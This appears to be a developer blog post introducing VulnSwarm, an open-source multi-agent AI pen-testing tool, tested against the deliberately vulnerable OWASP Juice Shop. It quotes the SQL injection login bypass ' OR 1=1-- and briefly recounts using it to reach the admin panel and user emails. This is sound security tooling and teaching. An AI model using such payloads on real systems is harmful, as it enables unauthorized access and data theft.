I Built a Multi-Agent AI Pen Tester Because AI Coding Tools Are Shipping Vulnerable Code

#ai #python #security #opensource

AI coding assistants are everywhere. Developers are shipping code faster than ever using Claude, Copilot, and Cursor.
They're also shipping SQL injection, hardcoded secrets, broken authentication, and XSS - faster than ever.
The problem is obvious once you think about it: AI tools optimize for working code, not secure code. They'll write a login form that functions perfectly and is trivially bypassable with ' OR 1=1--. They'll hardcode an API key because it's the fastest way to make the demo work. They'll skip input validation because you didn't ask for it.
Most solo developers and small teams will never hire a penetration tester. A basic pen test costs $500–$2,000 and takes weeks to schedule. So the vulnerabilities just ship.
I built VulnSwarm to fix that.

What VulnSwarm Does
VulnSwarm deploys a swarm of specialized AI agents that mirror a real penetration testing team. Instead of one model trying to do everything, each agent has a distinct role:
🔭 Recon Agent — maps the attack surface. Identifies entry points, fingerprints the tech stack, flags the highest-risk areas.
💥 Exploit Agent — takes the recon and determines what's actually exploitable. Rates each finding by severity, exploitability, and impact. Assigns CVSS-like scores.
🗡️ Red Team Agent — thinks like an attacker. Chains vulnerabilities together into realistic attack paths. Finds the worst-case scenario.
🛡️ Blue Team Agent — the defender. Takes everything the red team found and writes specific, code-level fixes. Prioritizes by effort vs. impact.
📄 Report Agent — synthesizes everything into a professional penetration testing report with an overall risk score, severity breakdown, and remediation roadmap.
The agents debate each other. The red team challenges the exploit analysis. The blue team pushes back on severity ratings. The result is more nuanced than any single model pass.

Testing It on OWASP Juice Shop
To test VulnSwarm, I pointed it at OWASP Juice Shop — a deliberately vulnerable web app designed for security testing practice.
I also tested it manually first. In about 30 seconds I:

Logged in as admin using ' OR 1=1-- in the email field
Accessed the admin panel at /administration
Retrieved 21 user email addresses
Found an exposed crypto wallet seed phrase in customer feedback

Then I ran VulnSwarm. Here's what it found automatically:
Risk Score: CRITICAL (90/100)

🔴 File Upload Endpoints — CVSS 9.0
Exploitable to inject malicious code or exfiltrate sensitive data.

🔴 Unvalidated API Endpoints — CVSS 9.0
API endpoints lack input validation and sanitization.

🟠 Missing Content-Security-Policy — CVSS 5.3
🟠 Missing Strict-Transport-Security — CVSS 5.3
🟠 Missing X-XSS-Protection — CVSS 5.3
🟠 Missing Referrer-Policy — CVSS 5.3
🟠 Missing Permissions-Policy — CVSS 5.3
This ran in about 15 minutes on a CPU-only VPS using llama3.2:3b. Larger models produce deeper findings — the SQL injection I found manually would have been caught by qwen2.5:14b or Claude.

How the Multi-Agent Architecture Works
The key insight is that security analysis benefits from multiple perspectives arguing with each other — the same way a real security team works.
A single model asked "find vulnerabilities in this app" will produce a list. It won't challenge its own assumptions. It won't think about how vulnerabilities chain together. It won't prioritize fixes by what a developer can actually implement today.
The agent pipeline forces specialization:
Your Code/App
│
▼
┌──────────┐ ┌───────────┐ ┌──────────┐ ┌─────────┐
│ Recon │───▶│ Exploit │───▶│ Red Team │───▶│ Blue │
│ Agent │ │ Agent │ │ Agent │ │ Team │
└──────────┘ └───────────┘ └──────────┘ └────┬────┘
│
▼
┌──────────┐
│ Report │
│ Agent │
└──────────┘
Each agent only sees what it needs to. The exploit agent doesn't know about fixes — it just finds problems. The blue team agent doesn't know about attack chains — it just writes solutions. The report agent synthesizes everything into something a developer or CTO can actually act on.

Running It Yourself
VulnSwarm supports Claude, GPT-4o, Gemini, OpenRouter, and Ollama. If you want to run it completely free and locally:
bashgit clone https://github.com/aaronsood/VulnSwarm.git
cd VulnSwarm
pip install -r requirements.txt

Pull a local model

ollama pull llama3.2:3b

Run it

python -m cli.main
For web app scanning, spin up a test target first:
bashdocker run --rm -p 3000:3000 bkimminich/juice-shop
Then point VulnSwarm at http://localhost:3000.
Web scanning is localhost-only by default — VulnSwarm won't touch anything you don't own.

What It Doesn't Do (Yet)
VulnSwarm is early. It's a first pass, not a replacement for a professional security team.
It misses zero-days. It won't find novel attack chains that require deep business logic understanding. Smaller models miss things that larger models catch. It doesn't yet integrate with CI/CD pipelines or GitHub Actions.
The roadmap includes all of that. For now it solves the problem that matters most: the 99% of developers who ship with zero security review and no budget to fix that.

The Bigger Picture
There's something poetic about using AI to find the vulnerabilities that AI introduced. As AI coding tools become the default way software gets written, AI security tooling needs to keep pace.
VulnSwarm is open source, MIT licensed, and early. If you're in security or AI tooling, contributions are very welcome.
GitHub: github.com/aaronsood/VulnSwarm

Built and tested on a Saturday with a CPU-only VPS, a deliberately hackable web app, and too much coffee.